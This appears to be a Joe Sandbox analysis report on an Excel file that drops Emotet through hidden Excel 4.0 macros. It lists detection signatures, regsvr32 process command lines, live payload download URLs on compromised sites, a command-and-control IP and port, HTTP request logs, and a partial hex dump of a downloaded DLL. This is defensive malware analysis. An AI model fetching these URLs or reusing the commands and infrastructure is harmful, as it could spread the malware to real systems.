Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
melimar.com.xls

Overview

General Information

Sample Name:melimar.com.xls
Analysis ID:632039
MD5:26fe1a6dbcaedcd92be80daa3f91a595
SHA1:f894d4913c99feb984e4885d46ef3935467b07b0
SHA256:10d164258a05b43017ea2344e234477490adaef157633778e0a2f2f558ef9385
Tags:SilentBuilderxls
Infos:

Detection

Hidden Macro 4.0, Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Office process drops PE file
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Detected potential crypto function
Found potential string decryption / allocating functions
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Downloads executable code via HTTP
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
PE file contains an invalid checksum
Drops PE files
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Registers a DLL
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Drops PE files to the user directory
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 2600 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 1820 cmdline: C:\Windows\System32\regsvr32.exe /S ..\uxevr1.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2472 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\HtkzwckLMRsIno\zbbayGuUXRtRt.dll" MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 1160 cmdline: C:\Windows\System32\regsvr32.exe /S ..\uxevr2.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 1720 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\XcSShRaCEZoMkA\LaeOniCeFWEmCa.dll" MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 768 cmdline: C:\Windows\System32\regsvr32.exe /S ..\uxevr3.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2376 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\WFwVcxpK\qMgBgEIcUslg.dll" MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2576 cmdline: C:\Windows\System32\regsvr32.exe /S ..\uxevr4.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • svchost.exe (PID: 1476 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: C78655BC80301D76ED4FEF1C1EA40A7D)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000003.00000002.925945389.00000000003C0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
    00000005.00000002.936818785.0000000002010000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      00000009.00000002.1223804747.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
        00000004.00000002.1223146291.00000000001F0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          00000005.00000002.936929041.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            Click to see the 7 entries
            SourceRuleDescriptionAuthorStrings
            7.2.regsvr32.exe.1f00000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              7.2.regsvr32.exe.1f00000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                3.2.regsvr32.exe.3c0000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  8.2.regsvr32.exe.2c0000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    8.2.regsvr32.exe.2c0000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                      Click to see the 7 entries
                      No Sigma rule has matched
                      No Snort rule has matched

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: melimar.com.xlsVirustotal: Detection: 57%Perma Link
                      Source: melimar.com.xlsMetadefender: Detection: 31%Perma Link
                      Source: melimar.com.xlsReversingLabs: Detection: 51%
                      Source: https://173.82.82.196:8080/URL Reputation: Label: malware
                      Source: http://salledemode.com/tgroup.ge/x4bc2kL4BzGAeUsVi/Avira URL Cloud: Label: malware
                      Source: https://173.82.82.196/;Avira URL Cloud: Label: malware
                      Source: https://173.82.82.196/URL Reputation: Label: malware
                      Source: https://vipteck.com/wp-admin/user/B8d6jr4pBND2HExAmI/lJWa95VlQ/Avira URL Cloud: Label: malware
                      Source: http://www.kabeonet.pl/wp-admin/VWlAz5vWJNHDb/Avira URL Cloud: Label: malware
                      Source: http://vipteck.com/wp-admin/user/B8d6jr4pBND2HExAmI/lJWa95VlQ/Avira URL Cloud: Label: malware
                      Source: http://kabeonet.pl/wp-admin/VWlAz5vWJNHDb/Avira URL Cloud: Label: malware
                      Source: salledemode.comVirustotal: Detection: 11%Perma Link
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\klJrMZJhgldiJr6j0XWPeZOiGs[1].dllReversingLabs: Detection: 56%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RD05UTHGkitvIJt[1].dllReversingLabs: Detection: 41%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\me435CErJsFGw1q[1].dllMetadefender: Detection: 28%Perma Link
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\me435CErJsFGw1q[1].dllReversingLabs: Detection: 58%
                      Source: C:\Users\user\uxevr1.ocxReversingLabs: Detection: 41%
                      Source: C:\Users\user\uxevr2.ocxMetadefender: Detection: 28%Perma Link
                      Source: C:\Users\user\uxevr2.ocxReversingLabs: Detection: 58%
                      Source: C:\Users\user\uxevr3.ocxReversingLabs: Detection: 56%
                      Source: C:\Windows\System32\HtkzwckLMRsIno\zbbayGuUXRtRt.dll (copy)ReversingLabs: Detection: 41%
                      Source: C:\Windows\System32\WFwVcxpK\qMgBgEIcUslg.dll (copy)ReversingLabs: Detection: 56%
                      Source: C:\Windows\System32\XcSShRaCEZoMkA\LaeOniCeFWEmCa.dll (copy)Metadefender: Detection: 28%Perma Link
                      Source: C:\Windows\System32\XcSShRaCEZoMkA\LaeOniCeFWEmCa.dll (copy)ReversingLabs: Detection: 58%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\me435CErJsFGw1q[1].dllJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\klJrMZJhgldiJr6j0XWPeZOiGs[1].dllJoe Sandbox ML: detected
                      Source: C:\Users\user\uxevr3.ocxJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RD05UTHGkitvIJt[1].dllJoe Sandbox ML: detected
                      Source: C:\Users\user\uxevr1.ocxJoe Sandbox ML: detected
                      Source: C:\Users\user\uxevr2.ocxJoe Sandbox ML: detected
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                      Source: unknownHTTPS traffic detected: 188.114.97.10:443 -> 192.168.2.22:49174 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 159.203.19.2:443 -> 192.168.2.22:49176 version: TLS 1.2
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800248B0 FindFirstFileW,FindNextFileW,FindClose,4_2_00000001800248B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800248B0 FindFirstFileW,FindNextFileW,FindClose,7_2_00000001800248B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800248B0 FindFirstFileW,FindNextFileW,FindClose,9_2_00000001800248B0

                      Software Vulnerabilities

                      barindex
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: RD05UTHGkitvIJt[1].dll.0.drJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RD05UTHGkitvIJt[1].dllJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\me435CErJsFGw1q[1].dllJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\klJrMZJhgldiJr6j0XWPeZOiGs[1].dllJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
                      Source: global trafficDNS query: name: vipteck.com
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.10:80
                      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.10:443

                      Networking

                      barindex
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 173.82.82.196 8080Jump to behavior
                      Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                      Source: Joe Sandbox ViewIP Address: 188.114.97.10 188.114.97.10
                      Source: Joe Sandbox ViewIP Address: 188.114.97.10 188.114.97.10
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 23 May 2022 06:34:55 GMTServer: ApacheX-Powered-By: PHP/7.2.34Cache-Control: no-cache, must-revalidatePragma: no-cacheExpires: Mon, 23 May 2022 06:34:55 GMTContent-Disposition: attachment; filename="me435CErJsFGw1q.dll"Content-Transfer-Encoding: binarySet-Cookie: 628b2b0ff1266=1653287695; expires=Mon, 23-May-2022 06:35:55 GMT; Max-Age=60; path=/Upgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Mon, 23 May 2022 06:34:55 GMTContent-Length: 365056Vary: Accept-EncodingStrict-Transport-Security: max-age=300Keep-Alive: timeout=5Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 99 b3 07 38 dd d2 69 6b dd d2 69 6b dd d2 69 6b b2 a4 c3 6b 83 d2 69 6b b2 a4 f7 6b d7 d2 69 6b d4 aa fa 6b da d2 69 6b dd d2 68 6b 84 d2 69 6b b2 a4 c2 6b f6 d2 69 6b b2 a4 f2 6b dc d2 69 6b b2 a4 f3 6b dc d2 69 6b b2 a4 f4 6b dc d2 69 6b 52 69 63 68 dd d2 69 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 76 7b 87 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0a 00 00 04 02 00 00 8a 03 00 00 00 00 00 80 35 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 f0 05 00 00 04 00 00 f5 54 06 00 02 00 40 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 d0 aa 02 00 84 00 00 00 04 a2 02 00 50 00 00 00 00 00 03 00 fc d1 02 00 00 f0 02 00 cc 0f 00 00 00 00 00 00 00 00 00 00 00 e0 05 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 02 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fa 03 02 00 00 10 00 00 00 04 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 54 8b 00 00 00 20 02 00 00 8c 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 37 00 00 00 b0 02 00 00 14 00 00 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 0f 00 00 00 f0 02 00 00 10 00 00 00 a8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 fc d1 02 00 00 00 03 00 00 d2 02 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8ikikikkikkikkikhkikkikkikkikkikRichikPEdv{b
                      Source: global trafficHTTP traffic detected: GET /wp-admin/user/B8d6jr4pBND2HExAmI/lJWa95VlQ/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: vipteck.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /wp-admin/iMc/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: airliftlimo.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /wp-admin/user/B8d6jr4pBND2HExAmI/lJWa95VlQ/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: vipteck.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /tgroup.ge/x4bc2kL4BzGAeUsVi/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: salledemode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /wp-admin/VWlAz5vWJNHDb/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: kabeonet.plConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /wp-admin/VWlAz5vWJNHDb/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.kabeonet.plConnection: Keep-Alive
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 173.82.82.196:8080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49176
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 23 May 2022 06:35:06 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.kabeonet.pl/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, Keep-AliveKeep-Alive: timeout=2, max=100Transfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 31 66 30 30 0d 0a 09 09 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 37 22 20 6c 61 6e 67 3d 22 70 6c 2d 50 4c 22 3e 0d 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 38 22 20 6c 61 6e 67 3d 22 70 6c 2d 50 4c 22 3e 0d 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 37 29 20 26 20 21 28 49 45 20 38 29 5d 3e 3c 21 2d 2d 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 6c 2d 50 4c 22 3e 0d 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 0d 0a 09 09 0d 0a 09 09 09 4e 69 65 20 7a 6e 61 6c 65 7a 69 6f 6e 6f 20 73 74 72 6f 6e 79 50 72 6f 6a 65 6b 74 6f 77 61 6e 69 65 20 73 74 72 6f 6e 20 69 6e 74 65 72 6e 65 74 6f 77 79 63 68 20 4f 70 6f 6c 65 09 09 0d 0a 09 09 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 31 30 30 2c 33 30 30 26 73 75 62 73 65 74 3d 6c 61 74 69 6e 2c 6c 61 74 69 6e 2d 65 78 74 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 09 09 0d 0a 20 20 20 20 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 31 38 2e 39 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 70 6c 5f 50 4c 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 53 74 72 6f 6e 79 20 6
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: regsvr32.exe, 00000004.00000002.1223615758.0000000002DD0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1223638195.0000000002E2F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1223643995.0000000002EA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                      Source: regsvr32.exe, 00000004.00000002.1223353771.0000000000310000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1223615758.0000000002DD0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1223638195.0000000002E2F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1223643995.0000000002EA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                      Source: regsvr32.exe, 00000004.00000002.1223615758.0000000002DD0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1223638195.0000000002E2F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1223643995.0000000002EA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                      Source: regsvr32.exe, 00000004.00000002.1223615758.0000000002DD0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1223638195.0000000002E2F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1223643995.0000000002EA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                      Source: regsvr32.exe, 00000004.00000002.1223615758.0000000002DD0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1223638195.0000000002E2F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1223643995.0000000002EA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: regsvr32.exe, 00000004.00000002.1223615758.0000000002DD0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1223638195.0000000002E2F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1223643995.0000000002EA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                      Source: regsvr32.exe, 00000004.00000002.1223615758.0000000002DD0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1223638195.0000000002E2F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1223643995.0000000002EA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                      Source: regsvr32.exe, 00000004.00000002.1223285742.00000000002D3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.997190286.00000000003AB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1223299575.00000000003AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                      Source: 77EC63BDA74BD0D0E0426DC8F80085060.7.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: regsvr32.exe, 00000004.00000002.1223615758.0000000002DD0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1223327690.0000000000302000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabme
                      Source: regsvr32.exe, 00000007.00000002.1223319258.00000000003C8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.997248395.00000000003C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabme~s
                      Source: regsvr32.exe, 00000009.00000002.1223280961.00000000002C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enO
                      Source: regsvr32.exe, 00000004.00000002.1223615758.0000000002DD0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1223638195.0000000002E2F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1223643995.0000000002EA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
